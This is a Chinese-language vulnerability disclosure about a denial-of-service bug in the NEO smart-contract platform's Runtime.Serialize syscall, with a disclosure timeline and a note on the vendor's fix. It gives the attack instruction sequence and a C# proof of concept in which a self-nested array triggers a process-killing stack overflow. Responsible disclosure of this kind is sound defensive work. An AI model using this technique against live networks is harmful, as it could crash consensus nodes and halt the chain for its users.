08月16, 2018

NEO智能合约平台Runtime_Serialize调用拒绝服务漏洞

Zhiniang Peng from Qihoo 360 Core Security

NEO是一个非盈利的社区化的区块链项目。它是利用区块链技术和数字身份进行资产数字化,利用智能合约对数字资产进行自动化管理,实现“智能经济”的一种分布式网络。目前Neo市值在coinmarket上排名全球第十五,是备受关注的区块链项目之一。我们在neo智能合约平台中发现一处拒绝服务漏洞,攻击者可利用该漏洞在瞬间使得整个neo网络崩溃。

Neo智能合约平台为合约提供了序列化虚拟机栈上某个对象的系统调用System.Runtime.Serialize。该调用再处理合约请求时未考虑到数组嵌套等问题,将导致智能合约系统平台crash。由于Neo目前是有7个主节点负责验证并打包全网交易。恶意用户将利用该漏洞的恶意合约发布到neo网络中,7个主节点在解析运行该恶意合约时将引发崩溃,进而导致整个neo网络拒绝服务。漏洞细节如下:
System.Runtime.Serialize系统调用会将用户可执行栈顶元素pop出来,然后调用SerializeStackItem函数进行序列化。SerializeStackItem函数内容如下:

大意是:当合约调用System.Runtime.Serialize系统调用的时候,会对pop出虚拟机栈上的第一个元素(参数StackItem item),然后进行SerializeStackItem序列化操作,写到binarywriter writer中。SerializeStackItem判断该元素类型,然后进行不同的序列化操作。

其中StackItem有很多类型。如果是数组array类型的话。就会将array的大小和子元素全部再进行一次序列化操作。这里的array是neo自定义的类型。本质上是一个List。此处没有考虑攻击者可能将数组a作为子元素再加入到数组a中。即 a.Add(a)。如果此时再对a进行反序列化,则会进入无限循环。直到程序栈空间耗尽。触发栈溢出异常StackOverflowException。

实际上在Neo虚拟机代码中,我们可以看到虚拟机执行的外层已经对任意异常了捕捉,如下:

但该异常捕捉无法处理StackOverflowException异常。在.net中StackOverflowException 异常会导致整个进程退出,无法catch该异常。进而导致整个neo节点进程直接崩溃。
攻击虚拟机指令: push(a), dup(), dup(), appen(), System.Runtime.Serialize()
则可导致栈溢出异常,程序直接崩溃。【同理,stuct结构,map结构一样可以利用该漏洞】。

值得一提的是,在我们邮件给Neo官方通知漏洞后7分钟内。Neo创始人之一的Erik Zhang就直接回复邮件确认漏洞存在,并在一个小时内提交漏洞修复。效率相当之高。 官方的对该漏洞修复非常干净,通过增加一个序列化后元素的列表List来防止我们攻击中的这种迭代引用。详细见下图:

漏洞时间线:
2018/8/15 15:00发现并测试漏洞
2018/8/15 18:57邮件给Neo官方漏洞细节
2018/8/15 19:04 Neo官方回复确认漏洞存在
2018/8/15 20:00 Neo创始人Erik Zhang提交漏洞修复

PoC:

using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using Neo;
using Neo.IO;
using Neo.SmartContract;
using Neo.VM;
using Neo.VM.Types;
using VMArray    = Neo.VM.Types.Array;
using VMBoolean = Neo.VM.Types.Boolean;

namespace ConsoleApp2
{
    class Program
    {
        public static void SerializeStackItem( StackItem item, BinaryWriter writer )
        {
            switch ( item )
            {
            case ByteArray _:
                writer.WriteVarBytes( item.GetByteArray() );
                break;
            case VMBoolean _:
                writer.Write( item.GetBoolean() );
                break;
            case Integer _:
                writer.WriteVarBytes( item.GetByteArray() );
                break;
            case InteropInterface _:
                throw new NotSupportedException();
            case VMArray array:
                writer.WriteVarInt( array.Count );
                foreach ( StackItem subitem in array )
                    SerializeStackItem( subitem, writer );
                break;
            case Map map:
                writer.WriteVarInt( map.Count );
                foreach ( var pair in map )
                {
                    SerializeStackItem( pair.Key, writer );
                    SerializeStackItem( pair.Value, writer );
                }
                break;
            }
        }


        static void Main( string[] args )
        {
            VMArray a, b;
            a    = new VMArray();
            b    = new VMArray();
            a.Add( 1 );
            b.Add( 2 );
            MemoryStream    ms    = new MemoryStream();
            BinaryWriter    writer    = new BinaryWriter( ms );

            RandomAccessStack Stack = new RandomAccessStack();
            Stack.Push( a );
            Stack.Push( Stack.Peek() );
            Stack.Push( Stack.Peek() );
            StackItem    newItem = Stack.Pop();
            StackItem    arrItem = Stack.Pop();
            if ( arrItem is VMArray aray )
            {
                aray.Add( newItem );
            }
            try
            {
                SerializeStackItem( Stack.Pop(), writer );
            }
            catch ( NotSupportedException )
            {
                Console.WriteLine( “ NotSupportedException ” );
            }
            catch ( StackOverflowException )
            {
                Console.WriteLine( “ StackOverflowException ” );
            }
            writer.Flush();

            Console.WriteLine( ms.ToArray().ToHexString() );
        }
    }

程序运行结果:

本文链接:https://blogs.360.net/post/neo智能合约平台runtime_serialize调用拒绝服务漏洞.html

-- EOF --

Comments